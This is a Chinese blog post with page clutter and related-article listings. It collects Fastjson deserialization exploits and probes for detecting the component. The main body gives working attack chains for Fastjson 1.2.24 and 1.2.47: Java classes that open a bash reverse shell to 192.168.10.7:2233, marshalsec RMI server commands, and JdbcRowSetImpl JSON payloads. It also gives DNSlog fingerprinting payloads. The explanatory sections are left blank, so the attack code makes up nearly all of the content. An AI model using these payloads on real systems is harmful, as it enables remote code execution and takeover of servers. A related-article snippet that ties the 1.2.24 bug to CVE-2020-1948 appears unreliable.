fastjson漏洞合集以及是否使用组件判断

最新推荐文章于 2024-05-16 09:59:39 发布
最新推荐文章于 2024-05-16 09:59:39 发布
阅读量726 收藏 3
点赞数 3
文章标签: web安全 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46626737/article/details/132225101
版权

判断是否使用了fastjson组件:
        (1)通过报错
            { 
                "name":"asd";
            通过不把}闭合,来导致报错
        (2)查看其fastjson的版本
            [
                {
                    "a":"a\x] {"@type":"java.lang.AutoCloseable"a
        (3)通过dnslog来判断是否使用了fastjson
            1.2.67版本前
            {"zeo":{"@type":"java.net.Inet4Address","val":"745shj.dnslog.cn"}}
            1.2.67版本后
            {"@type":"java.net.Inet4Address","val":"dnslog"}
            {"@type":"java.net.Inet6Address","val":"dnslog"}
    1.fastjson 1.2.24 反序列化导致任意命令执行漏洞
        (1)漏洞版本:1.2.24之前
        (2)漏洞原理:
        (3)利用方法:
            1>编写一个exp.java文件
                import java.lang.Runtime;
                import java.lang.Process;

                public class exp {
                    static {
                        try{
                            Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.10.7/2233 0>&1");
                        }catch(Exception e){
                            e.printStackTrace();
                        }
                    }
                }
                javac编译
            2>将class文件放到http服务目录下
            3>使用marshalsec-0.0.3-SNAPSHOT-all.jar开启一个rmi或者ladp服务
                java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.10.7/#exp" 8000
            4>开启监听2233端口
            5>在数据包中加入json的poc
                {
                    "naraku":{
                        "@type":"com.sun.rowset.JdbcRowSetImpl",
                        "dataSourceName":"rmi://192.168.10.7/exp",
                        "autoCommit":true
                    }
                }
            6>则会发现rmi服务会有回显,而且shell会反弹回来
    2.Fastjson 1.2.47 远程命令执行漏洞
        (1)漏洞版本:1.2.48以前
        (2)漏洞原理:
        (3)利用方式:
            1)写一个java文件
                import java.lang.Runtime;
                import java.lang.Process;

                public class poc {
                    static {
                        try {
                            Runtime rt = Runtime.getRuntime();
                            String commands = "/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.10.7/2233 0>&1";
                            Process pc = rt.exec(commands);
                            pc.waitFor();
                        } catch (Exception e) {
                            // do nothing
                        }
                    }
                }
                编译成class,放到http目录下
            2)开启监听2233端口
            3)开启一个rmi服务
                java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.10.7/#poc" 8000
            4)加入json格式的poc发送数据包
                {
                    "a":{
                        "@type":"java.lang.Class",
                        "val":"com.sun.rowset.JdbcRowSetImpl"
                    },
                    "b":{
                        "@type":"com.sun.rowset.JdbcRowSetImpl",
                        "dataSourceName":"rmi://192.168.10.7:8001/poc",
                        "autoCommit":true
                    }
                }
                则会发现rmi服务会有回显,而且shell会反弹回来

!QK
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
黑盒判断FastJson组件
课嗨教育的专栏
01-26 1348
判断方法个人总结有以下四种: 1. 响应报错 如果站点响应结果中会将代码控制台的错误结果回显,就可以用不闭合括号、引号等方式进行报错回显,报错结果中可以通过 类的包名判断是哪个json组件 com.alibaba.fastjson.JSONException com.fasterxml.jackson.databind.xxxxxxxxx 2. 支持额外属性的特性 fastjson支持类对象以外的属性获取,而jackson不支持,可以在测试时可以通过添加额外的参数值,查看是不否报
fastjson 判断是否包含_fastjson漏洞学习分析
weixin_34551573的博客
01-11 1181
0x00前言前面写了fastjson的利用,现在补上fastjson的分析,后面附上探测后端是否使用fastjon的方法(1.2.67)。0x01fastjson基本使用toJSONString()parseObject()这两个函数一个将对象转化为json字符串,一个将json字符串反序列化成对象。image.png一般来说使用第一种方法输出json字符串,这里将第二种方法写出来,是想体现fas...
fastjson反序列化漏洞测试方法
qq_43143133的博客
07-20 758
快速判断fastjson与jackson
fastjson 判断是否包含_通过dnslog探测fastjson的几种方法
weixin_39816362的博客
12-18 1353
0x01 背景在渗透测试中遇到json数据一般都会测试下有没有反序列化。然而json库有fastjson,jackson,gson等等。怎么判断后端不是fastjson呢?这就需要构造特定的payload了。昨天翻看fastjson源码时发现了一些可以构造dns解析且没在黑名单当中的类,于是顺手给官方提了下Issue。有趣的是后续的师傅们讨论还挺热闹的,我也在这次讨论中学习了很多。这篇文章算是对那...
探索快速且精准的Fastjson漏洞检测工具:FastjsonScan
最新发布
gitblog_00045的博客
05-16 709
探索快速且精准的Fastjson漏洞检测工具:FastjsonScan FastjsonScanFastjson扫描器,可识别版本、依赖库、autoType状态等。A tool to distinguish fastjson ,version and dependency项目地址:https://gitcode.com/gh_mirrors/fa/FastjsonScan 在今天这个高度数字化的...
通过dnslog探测fastjson的几种方法
Adminxe的博客
05-04 7721
0x01 背景 在渗透测试中遇到json数据一般都会测试下有没有反序列化。然而json库有fastjson,jackson,gson等等。怎么判断后端不是fastjson呢?这就需要构造特定的payload了。 昨天翻看fastjson源码时发现了一些可以构造dns解析且没在黑名单当中的类,于是顺手给官方提了下Issue。有趣的是后续的师傅们讨论还挺热闹的,我也在这次讨论中学习了很多。这篇...
FastjsonScan.jar 用于burp插件,扫描Fastjson漏洞
07-05
burp插件
fastjson漏洞环境
01-12
**Fastjson 漏洞详解** Fastjson 是阿里巴巴开源的一款高性能的 Java JSON 库,它提供了将 Java 对象转换为 JSON 字符串以及从 JSON 字符串反序列化为 Java 对象的功能。然而,自其发布以来,Fastjson 一直存在一些...
fastjson爆出重大漏洞,攻击者可使整个业务瘫痪
01-07
360CERT 判断漏洞危害中。影响面较大。攻击者可以通过发送构造好的请求而致使当前线程瘫痪,当发送的恶意请求过多时有可能使业务直接瘫痪。 建议广大用户对自身的业务/产品进行组件自查,防止自身业务受到攻击。
高版本的fastjson-1.2.71解决安全漏洞.rar
04-14
然而,随着广泛使用Fastjson在早期版本中出现了一些安全漏洞,这些漏洞可能导致远程代码执行(RCE)和其他安全风险。在标题提到的“高版本的fastjson-1.2.71解决安全漏洞”中,我们主要关注的是Fastjson如何通过...
C#简单快速的json组件fastJSON使用介绍
09-05
本文将详细介绍如何使用FastJSON组件以及其背后实现的优化技术。 首先,让我们了解如何使用FastJSON进行基本的序列化和反序列化操作。例如,在一个Razor代码生成器项目中,我们可能需要将数据库的表和列信息保存为...
2023最新最全 fastjson 漏洞批量检测工具使用教程。
logic1001的博客
11-29 2554
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
代码审计-Fastjson各版本漏洞分析(上)
cdyunaq的博客
04-15 3375
- 前言 - 最先出现问题的Fastjson 1.2.24反序列化漏洞已经分析过了,产生漏洞的原理也差不多理解了 •在1.2.25之后的版本,以及所有的.sec01后缀版本中,autotype功能默认是受限的(黑白名单机制) •在1.2.68之后的版本,fastjson增加了safeMode的支持。配置safeMode后,无论白名单和黑名单,都不支持autoType - 概念 - 可能出现一些新的概念,给一些参考链接吧 •FastJSON为什么要有autoType功能 •enable_auto
java:利用fastjson判断一个类型(java.lang.reflect.Type)是否是一个javabean
10km的专栏
09-10 8930
fastjson中JSON.toJSON(Object javaObject)方法将一个java对象被序列化成json对象时,返回的对象类型有三种可能:JSONObject,JSONArray,原始类型(简单类型)。 最近在使用fastjson进行对java对象序列化和反序列化时,遇到一个问题: 需要判断一个类型(java.lang.reflect.Type)是否为一个java bean(这里所
Fastjson反序列化漏洞复现(实战案例)
qq_50854662的博客
04-18 1808
Fastjson反序列化漏洞复现(实战案例)
Java代码审计——fastjson 1.2.68 反序列化漏洞 Exception
王嘟嘟的博客
03-14 9437
0x00 前言 反序列化总纲 继1.2.58绕过autotype之后,1.2.68又出现了新的绕过方式,通过Exception来进行绕过,但是此方法要求比较苛刻 0x01 环境搭建 首先来说版本,经过测试发现使用Exception的方法最低生效版本为1.2.40。所以maven调整到1.2.40即可。 这里我们需要假设有一个继承了Exception的类。 public class test extends Exception { private String domain; public
Java安全篇-Fastjson漏洞
m0_63138919的博客
03-28 3020
本文章参考网上师傅们的解题和代码审计思路,记录自己的学习过程,还希望各位博主 师傅 大佬 勿喷,还希望大家指出错误
FastJson 漏洞复现
来日可期的博客
09-11 2142
FastJson 1.2.24 反序列化导致任意命令执行漏洞Fastjson 1.2.47 远程命令执行漏洞
Fastjson反序列化漏洞分析
黑白的博客
06-29 3838
fastjson在解析json过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性,反序列化就是面向属性编程,不谋而合了,直接通过set注入就好了,这个autoType在对JSON字符串进行反序列化时,会读取@type的内容,把JSON内容反序列化成对象,并且调用set方法。
fastjson 漏洞
09-02
你想了解有关 fastjson 漏洞的信息吗?fastjson 是一个流行的 Java JSON 库,但在过去的一段时间里,它曾经存在一些安全漏洞。其中最著名的是 fastjson 1.2.24 版本以下的版本中的反序列化漏洞(CVE-2020-1948),该漏洞允许攻击者通过构造恶意 JSON 数据来执行任意代码。 这个漏洞的修复版本是 fastjson 1.2.24,如果你使用的是较早版本的 fastjson,请升级到最新版本以确保安全。此外,你还应该注意其他安全最佳实践,如避免将不受信任的 JSON 数据直接反序列化为 Java 对象,并确保对 fastjson 库进行及时的更新和升级。 如果你需要更多关于 fastjson 漏洞的详细信息,我建议你参考 CSDN 或其他可靠的安全资源,了解最新的安全建议和补丁信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值